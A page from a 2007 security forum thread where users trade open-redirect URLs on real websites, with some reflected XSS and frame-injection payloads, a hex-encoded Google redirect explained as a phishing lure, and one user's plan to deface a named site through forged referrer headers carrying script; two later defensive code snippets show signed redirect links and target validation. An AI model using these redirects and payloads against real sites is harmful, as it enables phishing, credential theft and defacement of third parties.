Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Current Page: 7 of 11
Re: So it begins - Redirects Edition
Posted by: rsnake
Date: January 17, 2007 06:50PM

http://www2.warnerbros.com/event.ng/Type=click&FlightID=8717&AdID=10507&TargetID=2957&Segments=1,4,5,11,20,21,22,26,27,29,43,45,47,63,80,101,120,123,124,125,126,127,137,141,147,153,154,155,171,174,193,216,220,223,229,230,255,258,261,263,275,279,294,300,302,310,311,339,353,355,358,369,380,381,382,392,421,425,428,478,480,504,511,533,536,552,567,568,569,585,588&Targets=2561,2638,320,2881,2957,135,3073,80,2556,2553,1923,1116,235,550,3043,3048,818&Values=30,46,50,60,72,83,91,100,110,132,205,229,231,474,808,854,924,1640,1702,1844,1862,1873,1877&RawValues=&Redirect=http:%2F%2Fwww.cnn.com/

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: trev
Date: January 19, 2007 06:43AM

http://dw.com.com/redir?destUrl=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: trev
Date: January 19, 2007 08:01AM

http://www.yandex.ru/redir?url=http://www.google.com/

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Lockdown
Date: January 20, 2007 09:11PM

Maddox = | http://maddox.xmission.com/outgoing.cgi?u=http%3A%2F%2Fmaddox%2Exmission%2Enet%2F |

Also, I think that if we work together on this board, and make a link that sends fake referrer headers, we can make an exploit on http://maddox.xmission.com/statistics/statistics.html << this page. We need at least 100 hits on a page that fakes the referrer headers as saying "><script>alert("HEY MADDOX! UPDATE YOU ASSWIPE!");</script> and then throw in an xss defacement page.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Lockdown
Date: January 26, 2007 02:39AM

http://www.australia.gov.au/click.php?http://www.rawrcore.net

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: tx
Date: January 26, 2007 02:46PM

http://animaldiversity.ummz.umich.edu/local/redirect.php/http://www.google.com
http://rd.business.com/index.asp?bdcu=http://www.google.com
http://www.ktuh.org/redirect.php?http://www.google.com.
http://www.fasterskier.com/events/results.php?http://www.google.com
http://ozreport.com/redirect.php?Http://www.google.com
http://www.davisstraub.com/OZ/redirect.php?Http://www.google.com
http://www.elib.gov.ph/edatabase/elibgetdb.php/http/www.google.com

Also, anyone have any thoughts on XSSing a redirect, ala http ://www10.dacafe.com/goto.php?'><script>location.replace("http://www.google.com");</script> (sorry the link gets truncated if I paste it directly)

-tx @ lowtech-labs.org



Edited 5 time(s). Last edit at 01/26/2007 05:04PM by tx.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Tribute
Date: January 28, 2007 05:20PM

http://dect.myspace.com/event.ng/Type=click&Redirect=http://www.google.com

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Lockdown
Date: January 29, 2007 02:58AM

@tx: http://www10.edacafe.com/IP/result_vcx.php?keywords=lol'%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: eyeced
Date: January 29, 2007 09:35AM

http://www.google.co.uk/url?q=http://ebay.co.uk

So I was looking on Google, and the redirect was staring at me. It's on the "personalise my home page" link on the Google homepage. It's a lot longer than that link originally, but I started trimming variables from it and it turns out you only need that.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: SW
Date: January 31, 2007 01:12AM

Can someone explain how these are useful? -.-

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: tx
Date: January 31, 2007 02:04PM

http://securebar.secure-tunnel.com/cgi-bin/nph-freebar.cgi/110110A/http/www.google.com

It's actually a proxy, but changing the variable immediately preceding the uri seems to cause it to no longer display their little banner.

http://securebar.secure-tunnel.com/cgi-bin/nph-freebar.cgi/1A/http/www.google.com

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 01/31/2007 02:08PM by tx.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: eyeced
Date: January 31, 2007 04:11PM

SW Wrote:
-------------------------------------------------------
> Can someone explain how these are useful? -.-

For phishing in the middle of the sea...

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Lockdown
Date: January 31, 2007 08:07PM

@ Previous post:

Basically, they can be used as links that seem legitimate to someone clicking them (encode the URL in hex), and when they click it they are redirected. Because the link they originally clicked looked valid, there's no reason for them to double check, and thus a page that looks like a legitimate login page or something on that site would seem authentic, but could actually be used to record passwords and whatnot.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: eyeced
Date: February 01, 2007 11:09AM

An example of the Google one:

http://www.google.co.uk/url?q=http://fakelogin.com

Could be encoded (hex) into

www.google.co.uk/url?q=%0D%0A%68%74%74%70%3A%2F%2F%66%61%6B%65%6C%6F%67%69%6E%2E%63%6F%6D%00

Which looks legitimate enough...

*Just checked and google have patched this now*

-They must actually have someone working for them that reads this forum constantly, as exploits in Google are patched very quickly.

*Edit* - they are using timestamps now to make sure that it cannot be permanently used. - thanks trev.



Edited 4 time(s). Last edit at 02/02/2007 11:15AM by eyeced.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: trev
Date: February 01, 2007 01:11PM

eyeced, ust is a Unix timestamp and usg is a checksum of all the parameters. The link you posted is simply only valid for a short time; after that you will need to use one with a more current timestamp.

Options: ReplyQuote
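The timestamp-plus-checksum scheme trev describes, sketched from the defender's side as an added example (not code from the thread or from Google). Assumptions: the checksum is an HMAC-SHA256 under a server-side secret, `ust` holds the expiry time, and `SECRET`, `MAX_AGE`, `make_link` and `check_link` are hypothetical names.

```python
import hashlib
import hmac
import time
from typing import Optional
from urllib.parse import parse_qs, urlencode, urlsplit

SECRET = b"constructed-demo-key"  # assumption: server-side secret, never sent to clients
MAX_AGE = 300                     # assumption: a link is honoured for five minutes


def _mac(target: str, ust: int) -> str:
    # The MAC covers every parameter, so neither q nor ust can be changed alone.
    msg = urlencode({"q": target, "ust": ust}).encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()


def make_link(target: str, now: Optional[float] = None) -> str:
    """Build a redirect link whose ust parameter is its expiry time."""
    ust = int(time.time() if now is None else now) + MAX_AGE
    return "/url?" + urlencode({"q": target, "ust": ust, "usg": _mac(target, ust)})


def check_link(link: str, now: Optional[float] = None) -> Optional[str]:
    """Return the target if the link is authentic and unexpired, else None."""
    params = parse_qs(urlsplit(link).query)
    try:
        target, ust, usg = params["q"][0], int(params["ust"][0]), params["usg"][0]
    except (KeyError, ValueError):
        return None  # bare /url?q=... with the other variables trimmed off
    if not hmac.compare_digest(_mac(target, ust).encode(), usg.encode()):
        return None  # q or ust was altered after signing
    if (time.time() if now is None else now) > ust:
        return None  # stale link: a fresh timestamp needs a fresh signature
    return target
```

A link signed this way still redirects anywhere the server itself chose to sign, so the signing side has to decide which targets it is willing to issue links for.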
Re: So it begins - Redirects Edition
Posted by: ascii
Date: February 02, 2007 04:21PM

Grab some funsec:

http://www.ush.it/2007/01/30/bad-url-redirections-aka-many-thanks-to-our-partners/

see you, ascii

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: kirke
Date: February 10, 2007 02:22PM

not sure if already mentioned:
http://msdn.microsoft.com/library/default.asp?url=//ha.ckers.org/images/stallowned.jpg

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: trev
Date: February 11, 2007 08:43PM

Nice frame injection! Always wanted to do this: http://msdn.microsoft.com/library/default.asp?url=//www.msfirefox.com/HAS9DY92828AUS9D29AIS9DI-20I0ASDJA89H2617219I9ASDSADHU28A8HG8DBASY723.html

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: tx
Date: February 12, 2007 03:25PM

Looks like that msdn redirect is already fixed.

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Ghozt
Date: February 13, 2007 01:46AM

tx Wrote:
-------------------------------------------------------
> Looks like that msdn redirect is already fixed.


It only works in Firefox.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Date: February 13, 2007 11:05PM

Found one earlier today while my girlfriend was looking at dead kids. They've been Sonny BonOWND.

http://www.mydeathspace.com/go.aspx?back=/App_Errors/404.aspx&go=http://www.awesomeandrew.net/index2.php?content=images/ownd/2


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: tx
Date: February 15, 2007 05:08PM

http://as.cmpnet.com/event.ng/Type=click&Redirect=http://www.google.com

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: rsnake
Date: February 16, 2007 05:36PM

The MSDN issue is not fixed, but it only works in Firefox if you didn't test in that.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Date: February 17, 2007 03:43AM

http://www.regnow.com/softsell/visitor.cgi?action=site&vendor=7998&ref=http://www.awesomeandrew.net

Options: ReplyQuote
Re: So it begins - Redirects Edition
Date: February 17, 2007 03:51AM

http://www.codemasters.com/redirect/redirect.php?url=http://www.awesomeandrew.net


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: So it begins - Redirects Edition
Date: February 17, 2007 03:58AM

http://www.northerntelmobility.com/redirect.php?dir=http://www.awesomeandrew.net


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: So it begins - Redirects Edition
Date: February 17, 2007 04:08AM

www.inow.co.nz/redirect.php?url=http://www.awesomeandrew.net


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: So it begins - Redirects Edition
Date: February 17, 2007 04:17AM

Instant
http://www.jnj.com/leaving.jsp?url=http://www.awesomeandrew.net

Warning
http://www.jnj.com/exit_warning.jsp?url=http://www.awesomeandrew.net


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: alf
Date: February 17, 2007 01:38PM

tx Wrote:
-------------------------------------------------------
> http://animaldiversity.ummz.umich.edu/local/redirect.php/http://www.google.com
> http://rd.business.com/index.asp?bdcu=http://www.google.com
> http://www.ktuh.org/redirect.php?http://www.google.com.
> http://www.fasterskier.com/events/results.php?http://www.google.com
> http://ozreport.com/redirect.php?Http://www.google.com
> http://www.davisstraub.com/OZ/redirect.php?Http://www.google.com
> http://www.elib.gov.ph/edatabase/elibgetdb.php/http/www.google.com
>
> Also, anyone have any thoughts on XSSing a redirect, ala http ://www10.dacafe.com/goto.php?'>location.replace("http://www.google.com"); (sorry the link gets truncated if I paste it directly)

example for xss through redirects: http://ozreport.com/redirect.php?data:text/html,<script>alert(1)</script>

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Lockdown
Date: February 17, 2007 09:42PM

This exploit affects the billing systems of countless web hosting companies.

WHMCS (Hosting CMS) Flaw found by Lockdown

http://demo.whmcs.com/dologin.php?goto=%68%74%74%70%3A%2F%2F%77%77%77%2E%72%61%77%72%63%6F%72%65%2E%6E%65%74%2F%69%6E%64%65%78

hai mom

----

-Lockdown-

http://www.rawrcore.net



Edited 1 time(s). Last edit at 02/17/2007 09:43PM by Lockdown.

Options: ReplyQuote
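A server-side check for a redirect parameter that refuses the target forms posted in this thread: hex-encoded URLs, the `%0D%0A` ... `%00` wrapper, mixed-case `Http://`, scheme-relative `//host` and `data:` URIs. This is an added example, not code from any post or affected site; `ALLOWED_HOSTS` and `safe_target` are hypothetical names, and the input is assumed to be the raw, still percent-encoded parameter value.

```python
from urllib.parse import unquote, urlsplit

ALLOWED_HOSTS = {"www.example.com"}  # assumption: the site's own hostnames


def safe_target(raw: str, default: str = "/") -> str:
    """Return the decoded target if it stays on the site, else default."""
    value = unquote(raw)  # compare what the browser will see, not the encoded form
    # CR, LF, NUL and other control characters never belong in a redirect target.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
        return default
    # Browsers treat a backslash like a slash, so normalise before parsing.
    value = value.strip().replace("\\", "/")
    try:
        parts = urlsplit(value)
        host = parts.hostname
    except ValueError:
        return default  # malformed authority, for example a broken IPv6 literal
    if parts.scheme:
        # urlsplit lowercases the scheme, so "Http://" is judged as "http://".
        if parts.scheme not in ("http", "https"):
            return default  # data:, javascript: and similar
        return value if host in ALLOWED_HOSTS else default
    if value.startswith("//"):
        # Scheme-relative targets leave the site just like absolute URLs do;
        # "///host" has no parsed host at all and is refused as well.
        return value if host in ALLOWED_HOSTS else default
    # Anything left must be a plain site-local path.
    return value if value.startswith("/") else default
```

Path-style redirectors such as `redirect.php/http/host` need the same check applied to whatever URL the script rebuilds from the path.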